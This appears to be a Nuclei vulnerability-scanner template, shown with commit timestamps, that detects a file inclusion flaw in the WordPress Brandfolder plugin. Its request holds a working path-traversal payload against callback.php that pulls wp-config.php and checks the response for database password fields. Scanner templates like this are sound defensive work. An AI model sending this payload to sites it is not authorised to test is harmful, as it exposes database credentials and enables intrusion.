nuclei-templates/vulnerabilities/wordpress/brandfolder-lfi.yaml

30 lines
797 B
YAML
Raw Normal View History

id: brandfolder-lfi
2021-09-24 10:49:09 +00:00
info:
name: Wordpress brandfolder plugin - RFI & LFI
2021-09-24 10:49:09 +00:00
author: 0x_Akoko
severity: high
2021-10-14 12:35:42 +00:00
description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
2021-09-24 10:49:09 +00:00
reference:
- https://www.exploit-db.com/exploits/39591
- https://cxsecurity.com/issue/WLB-2016030120
tags: wordpress,wp-plugin,lfi,rfi
2021-09-24 10:49:09 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200